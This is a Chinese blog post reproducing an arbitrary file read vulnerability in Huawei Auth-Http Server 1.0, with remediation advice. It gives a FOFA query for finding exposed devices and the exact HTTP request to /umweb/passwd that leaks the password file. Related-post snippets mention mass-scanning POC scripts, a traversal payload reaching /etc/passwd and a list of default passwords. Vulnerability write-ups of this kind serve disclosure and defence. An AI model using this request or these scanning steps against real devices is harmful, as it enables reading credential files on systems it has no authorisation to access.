【漏洞复现】华为Auth-Http服务任意文件读取漏洞

于 2024-04-01 13:39:30 发布
阅读量2k 收藏 6
点赞数 6
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80733390/article/details/137229877
版权
本文报道了华为Auth-HttpServer1.0的一个任意文件读取漏洞,攻击者可借此获取敏感信息。建议升级固件、应用防火墙、强化权限控制和进行安全加固,同时实施监控以及时应对潜在威胁。
摘要由CSDN通过智能技术生成

免责声明

文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述

华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件。

影响范围

华为Auth-Http Server 1.0

资产测绘

Fofa:

server="Huawei Auth-Http Server 1.0"

images

漏洞复现

GET /umweb/passwd HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

images

修复建议

  1. 升级固件:检查并安装华为提供的最新固件更新,这可能包含对Auth-HTTP服务的安全加强。
  2. 应用防火墙:配置防火墙规则,限制对Auth-HTTP服务的访问,仅允许可信任的IP地址或IP地址范围访问。
  3. 权限控制:审核Auth-HTTP服务的配置,确保服务运行在受限制的用户权限下,以减少文件泄露的风险。
  4. 安全加固:对系统进行安全加固,包括增强文件系统权限、加密敏感数据等措施。
  5. 监控和报警:实施监控措施,一旦发现可能的攻击尝试,立即报警并采取响应措施。
Nday_Seeker
关注
Huawei Auth-HTTP Server 1.0 任意文件读取
weixin_43567873的博客
03-09 714
Huawei Auth-HTTP Server 1.0 任意文件读取
Huawei Auth-HTTP Server 1.0 存在任意文件读取漏洞 附POC软件
nnn2188185的博客
12-12 1285
Huawei Auth-HTTP Server 1.0 是华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器,旨在为企业网络和系统提供安全的访问控制服务
Huawei Auth-Http Server 1.0 passwd文件泄露漏洞POC
07-05
-u 指定单个url -l 指定url文件 先用fofa脚本爬取所有Huawei Auth-Http相关资产(fofa脚本下载地址:) python3 fofa-cwillchris.py -k body="umweb/u20.png" 然后用此脚本 ./poc.bin -l url.txt
华为网络设备&服务器默认口令汇总.xls
08-07
华为网络设备与服务器默认口令汇总,这才是网工的宝典之一,不管做甲方还是做乙方,在国内华为的设备还是很常见的。
华为Auth-HTTP服务任意文件读取漏洞
fly夏天的博客
12-27 3618
文章复现华为auth-http服务器的任意文件读取漏洞并提供了简单的利用方法
华为Auth-Http Serve任意文件读取
zkaqlaoniao的博客
11-09 3332
华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件
漏洞复现-华为Auth-HTTP服务任意文件读取漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-11 2514
漏洞复现-华为Auth-HTTP服务任意文件读取漏洞,附带自己写的poc脚本
漏洞复现--Huawei-Auth-HTTP-任意文件读取
qq_53003652的博客
12-22 1694
Huawei Auth-HTTP Server 1.0 是华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器,旨在为企业网络和系统提供安全的访问控制服务。该产品存在任意文件读取漏洞
漏洞复现华为Auth-Http服务存在任意文件读取
知黑而守白
12-19 598
华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件
华为Auth-HTTP服务任意文件读取漏洞处理
黄树茂博客
12-29 2255
处理方式:关闭web-authentication服务华为防火墙认证服务漏洞
auth-server-demo:Spring授权服务器0.1.0 && Spring Boot 2.4.2
05-12
授权码认证 curl --location --request GET ' http://localhost:3000/oauth2/authorize?client_id=pig&client_secret=pig&response_type=code&redirect_uri=http://localhost:8080/renren-admin/sys/oauth2-sso ' 获取令牌 curl --location --request POST ' http://localhost:3000/oauth2/token ' \ --header ' Authorization: Basic cGlnOnBpZw== ' \ --header ' Content-Type: application/x-www-form-urlencoded ' \ --data-urlencode '
漏洞复现华为Auth-Http服务文件读取漏洞
晚风不及你
12-18 2758
Huawei Auth-HTTP Server 1.0 可以实现基于角色的访问控制,通过用户的身份认证和权限控制,确保只有经过授权的用户可以访问特定的资源和服务。它支持常见的身份认证协议和技术,如LDAP、RADIUS、TACACS+等,能够与企业现有的认证系统无缝集成,提供一致的认证体验。
华为 Auth-HTTP Server 1.0 任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
12-12 1454
华为 Auth-HTTP Server 1.0 是华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器,旨在为企业网络和系统提供安全的访问控制服务。该服务存在任意文件读取漏洞
任意文件读取漏洞复现
来日可期的博客
08-31 4176
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
HUAWEI HG659任意文件读取漏洞
chaojixiaojingang
08-03 1244
1.漏洞描述 HUAWEI HG659 lib存在任意文件读取漏洞,攻击者可通过该漏洞读取任意文件。 2.网络资产查找 FOFA:app="HUAWEI-Home-Gateway-HG659" 3.POC /lib///....//....//....//....//....//....//....//....//etc//passwd 4.漏洞复现 1)访问HUWEI HG659页面 2)在URL后添加POC ...
任意文件读取漏洞-linux敏感文件路径字典fuzz
最新发布
qq_82303224_的博客
02-25 1020
其中:/var/lib/mlocate/mlocate.db 为linux索引文件包含所有系统文件列表。
Huawei Auth-Http Server 1.0 passwd文件泄露漏洞
Cwillchris的博客
07-05 2713
/Huawei-Auth-Http-Server1.0passwd文件泄露.bin -l 1.txt (将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt。先用fofa脚本爬取所有碧海威相关资产(
华为防火墙1day?
szgyunyun的博客
12-21 4685
缺省情况下,FW通过8887端口提供内置的本地Portal认证页面,用户可以主动访问或HTTP重定向至认证页面(https://接口IP地址:8887)进行本地Portal认证。当企业部署了外部Portal服务器对用户进行认证时,需要配置自定义Portal认证。Portal认证通常也称为Web认证,一般将Portal认证网站称为门户网站。未认证用户上网时,设备强制用户登录到特定站点,用户可以免费访问其中的服务。当用户需要使用互联网中的其它信息时,必须在门户网站进行认证,只有认证通过后才可以使用互联网资源。
【0day】复现HUAWEI防火墙User Login任意文件读取漏洞
记录并分享学习安全的知识点..
08-08 1657
华为防火墙User Login存在任意文件读取漏洞,攻击者可读取passwd文件
huawei auth-http server 1.0
09-01
Huawei Auth-HTTP Server 1.0 是华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器,旨在为企业网络和系统提供安全的访问控制服务。 Huawei Auth-HTTP Server 1.0 可以实现基于角色的访问控制,通过用户的身份认证和权限控制,确保只有经过授权的用户可以访问特定的资源和服务。它支持常见的身份认证协议和技术,如LDAP、RADIUS、TACACS+等,能够与企业现有的认证系统无缝集成,提供一致的认证体验。 此外,Huawei Auth-HTTP Server 1.0 还具备安全审计与日志功能,可以记录和追踪用户的访问活动,为企业的安全风险管理提供重要的数据支持。它可以生成详细的访问日志,包括用户身份、访问时间、访问内容等信息,帮助企业了解和分析网络访问情况,及时发现异常活动和潜在的安全威胁。 Huawei Auth-HTTP Server 1.0 还提供了可视化的管理界面,管理员可以通过简单直观的操作完成用户账号的创建、配置角色权限、管理访问策略等任务,提高工作效率。同时,它支持高可用和容灾机制,能够保证身份认证和授权服务的持续可用性,降低系统故障对业务造成的影响。 总之,Huawei Auth-HTTP Server 1.0 是一款功能强大、安全可靠的身份验证和授权解决方案,能够有效保护企业的资源和网络安全,提供用户友好的身份认证体验,是企业网络安全管理中的重要工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值